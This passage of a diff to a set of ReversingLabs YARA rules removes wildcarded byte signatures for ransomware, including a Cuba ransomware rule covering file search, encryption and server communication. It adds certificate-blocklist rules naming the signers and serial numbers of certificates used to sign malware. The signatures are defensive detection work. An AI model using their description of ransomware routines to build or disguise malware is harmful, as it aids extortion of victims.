-            FF 15 ?? ?? ?? ?? 8B F0 0F 57 C0 8D 84 24 ?? ?? ?? ?? 66 0F 7F 84 24 ?? ?? ?? ?? 50
-            8D 84 24 ?? ?? ?? ?? 8B D6 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B CE E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            56 FF 15
-        }
-		$server_communication_4_2_2 = {
-            FF D7 8B 0D ?? ?? ?? ?? 8B D0 8B 49 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ??
-            50 FF D7
-        }
-		$server_communication_4_2_3 = {
-            6A ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 6A ?? 56 FF 54 24 ?? 8B 0D ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 41 ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 71
-            ?? 56 FF 54 24
-        }
-		$server_communication_4_2_4 = {
-            FF 54 24 ?? 8B 44 24 ?? 66 C7 84 04 ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? FF 70 ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 8B 7C 24 ?? FF D7 56 FF
-            D7
-        }
-		$server_communication_4_2_5 = {
-            57 8B 7C 24 ?? FF D7 56 FF D7 FF 74 24 ?? FF D7 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            6A ?? FF 15
-        }
-		$server_communication_3_1 = {
-            8A 08 40 3A CB 75 ?? 2B C7 50 8D 94 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? EB
-        }
-		$server_communication_3_2 = {
-            68 ?? ?? ?? ?? 88 9C 04 ?? ?? ?? ?? 51 88 9C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 8B 7C 24 ?? 83 C7 ?? 89 7C 24 ??
-            81 FF ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 39 1D ?? ?? ??
-            ?? 75 ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15
-        }
-		$file_search_3_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? [0-1] 56 57 33 C0
-            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8
-        }
-		$file_search_3_1_1 = {
-            FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ??
-            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
-        }
-		$file_search_3_1_2 = {
-            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 8D ?? ?? ?? ?? 51 FF D7 6A ?? 8D 95 ?? ?? ?? ??
-            6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A
-            ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
-            85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 85 C0 74 ?? E8
-        }
-		$file_search_3_2_1 = {
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            50 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ??
-            ?? ?? ?? 83 FF ?? 0F 85
-        }
-		$file_search_3_2_2 = {
-            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ??
-            ?? FF D6 6A ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? FF D7 85 C0 74 ?? E8
-        }
-		$search_and_encrypt_3_1 = {
-            8B C3 83 C4 ?? 8D 50 ?? [1-3] 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
-            ?? 68 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ??
-            ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
-        }
-		$search_and_encrypt_3_2 = {
-            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
-            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
-            ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-        }
-		$search_and_encrypt_3_3 = {
-            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 53
-            8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D ?? ??
-            ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ??
-            ?? ?? 68 ?? ?? ?? ?? ?? E8
-        }
-		$search_and_encrypt_3_4 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B CE E8
-            ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C6 E8 ??
-            ?? ?? ?? 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1c:c3:7d:e5:db:ed:09:7f:98:f5:6d:bc" and 1476693977 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "9938b4c5-4a2b-5f4a-92a0-28c3519b1ed3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15278-L15294"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "28f71c0572e769d4a0cb289071912bc79cddfd98a3a8161c5400c7bee7090bf5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_2_6a_1 and $encrypt_file_0_2_6a_2 and $server_communication_0_2_6a_1 and $server_communication_0_2_6a_2 ) or ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_3_1 and $server_communication_0_3_1_1 and $server_communication_0_3_1_2 ) or ( $file_search_0_3_3_1 and $file_search_0_3_3_2 and $encrypt_file_0_3_3_1 and $encrypt_file_0_3_3_2 and $server_communication_0_3_3_1 and $server_communication_0_3_3_2 ) or ( $file_search_0_3_4a_1 and $file_search_0_3_4a_2 and $encrypt_file_0_3_4a_1 and $encrypt_file_0_3_4a_2 and $server_communication_0_3_4a_1 and $server_communication_0_3_4a_2 ) or ( $file_search_0_3_5a_1 and $file_search_0_3_5a_2 and $encrypt_file_0_3_5a_1 and $encrypt_file_0_3_5a_2 and $server_communication_0_3_5a_1 and $server_communication_0_3_5a_2 ) or ( $server_communication_2_0_4e and $search_and_encrypt_2_0_4e_1 and $search_and_encrypt_2_0_4e_2 and $search_and_encrypt_2_0_4e_3 and $search_and_encrypt_2_0_4e_4 and $search_and_encrypt_2_0_4e_5 ) or ( $server_communication_4_0_1 and $server_communication_4_0_2 and $server_communication_4_0_3 and $file_search_4_0_1 and $file_search_4_0_2 and $file_search_4_0_3 ) or ( $file_search_4_1b_1 and $file_search_4_1b_2 and $file_search_4_1b_3 and $server_communication_4_1b_1 and $server_communication_4_1b_2 and $server_communication_4_1b_3 and $server_communication_4_1b_4 and $server_communication_4_1b_5 ) or ( $file_search_4_2_1 and $file_search_4_2_2 and $server_communication_4_1b_1 and $server_communication_4_2_1 and $server_communication_4_2_2 and $server_communication_4_2_3 and $server_communication_4_2_4 and $server_communication_4_2_5 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_1_1 and $file_search_3_1_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_2_1 and $file_search_3_2_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wei Liu" and pe.signatures [ i ] . serial == "50:f6:6a:b0:d7:ed:19:b6:9d:48:f6:35:e6:95:72:fa" and 1467158400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cuba : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cuba ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b2c81849-9fa6-58b6-b6fe-4d9a5f0923ea"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "7609083d-145b-5594-a04b-72c2862873eb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cuba.yara#L1-L126"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15296-L15312"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0a8dea6e38a6407897b994ea119bc8b0712a94363b7b3942dcd32c65ee5548d4"
+		logic_hash = "63d4c1aaafdf6de14d0ae78035644cf6b0fefab8b0063d2566ca38af9f9498d2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cuba"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8B D7 8D 4D ?? E8 ??
-            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
-            0F B7 00 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
-            0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45
-            ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43
-            45 ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0
-            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D3 C6
-            45 ?? ?? 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
-            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 55 ??
-            8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 8B 5D ?? 83 FB ?? 8B 7D ?? 8B 45 ?? 0F
-            43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ??
-            83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9
-            ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ??
-            ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1
-        }
-		$find_files_p2 = {
-            66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ??
-            8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75
-            ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8
-            ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75
-            ?? EB ?? 83 7D ?? ?? 75 ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 FA ?? 0F 43 C1 66 83 38 ??
-            75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66
-            83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 74 ?? 8B 8D ?? ?? ?? ??
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? C6 45 ?? ?? 83 FB ?? 72 ?? 8D 0C 5D ??
-            ?? ?? ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 83 C0 ?? 83 F8 ?? 0F
-            87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
-            9D ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 55 ?? C7 45
-            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15
-        }
-		$enum_resources = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B DA 89 5D ?? 8D 45 ?? C7 45 ?? ?? ??
-            ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 32
-            C0 E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 66 90
-            FF 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 83 7E ?? ?? 0F 85
-            ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 56 ?? 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 58 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C3 8D 4D
-            ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8B CB C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ??
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? 8B D3 E8 ?? ?? ?? ?? 47
-            83 C6 ?? 3B 7D ?? 0F 82 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 7D ?? 0F 57 C0 66 0F 13 45 ??
-            C7 45 ?? ?? ?? ?? ?? 8B C7 83 7F ?? ?? 72 ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 75 ?? FF 15 ?? ??
-            ?? ?? 32 DB E9 ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74
-            ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8E ?? ?? ?? ?? 6A ?? 8D
-            41 ?? 50 6A ?? 8D 56 ?? 51 52 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 53 FF 15
-            ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 8D 45 ?? 8B CE
-            50 E8 ?? ?? ?? ?? EB ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 6A ?? EB ?? 6A ?? 8D
-            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 75 ?? 8A D8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 83
-            CE ?? 89 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 83 7F ?? ?? 72 ?? 8B 3F 50 57 FF 15 ?? ??
-            ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ??
-            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? CC CC CC 55 8B EC 83 E4 ?? 81 EC
-        }
-		$encrypt_files_p2 = {
-            A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B 5D ?? 56 57 8B F9 89 5C 24 ?? 6A ??
-            8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 8B 17 8B 47 ?? 2B C2 50 52 FF 33 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33
-            CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 44 24 ?? 8B 57 ?? 8B 0F 89 44 24 ?? 89 54 24
-            ?? 89 4C 24 ?? 85 C0 7E ?? 8B D8 8B 47 ?? 8B F3 2B 47 ?? 3B D8 52 0F 43 F0 8D 47 ??
-            56 51 50 E8 ?? ?? ?? ?? 56 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 2B DE
-            8B 54 24 ?? 03 CE 83 C4 ?? 89 4C 24 ?? 85 DB 7F ?? 8B 5C 24 ?? 6A ?? 6A ?? 0F 57 C0
-            66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 33 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
-            85 C0 75 ?? FF D6 89 43 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ??
-            89 44 24 ?? 8D 87 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 4C 24 ?? ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 89 43 ?? 6A ?? 8D 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF 37 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            FF D6 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? B0 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "11:21:2f:50:28:36:a7:84:75:21:60:35:1d:ef:b1:36:cf:09" and 1463726573 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4e17aed7-fd76-549f-bcf7-84c97efc44e4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15314-L15330"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "917f324cbe91718efc9b2f41ef947fa8f1a501dde319936774d702d57b1e6b37"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prince city music bar" and pe.signatures [ i ] . serial == "2c:16:be:9a:7c:e2:a2:3a:b7:a4:b4:eb:7d:a3:40:0c" and 1371081600 <= pe.signatures [ i ] . not_after )
 }
